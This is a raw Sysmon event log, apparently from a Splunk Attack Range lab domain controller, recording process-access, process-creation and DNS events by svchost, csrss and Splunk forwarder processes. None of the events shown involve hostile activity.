13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EEF-6005-E600-00000000A301}4312C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EEF-6005-E600-00000000A301}4312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.987{59A5CD1D-8EEF-6005-E600-00000000A301}4312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.455{59A5CD1D-8EEF-6005-E500-00000000A301}7481408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EEF-6005-E500-00000000A301}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EEF-6005-E500-00000000A301}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EEF-6005-E500-00000000A301}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.315{59A5CD1D-8EEF-6005-E500-00000000A301}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.982{59A5CD1D-8EEB-6005-DF00-00000000A301}3544win-dc-495.attackrange.local010.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 10341000x80000000000000004304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.815{59A5CD1D-8EF0-6005-E700-00000000A301}11961132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EF0-6005-E700-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
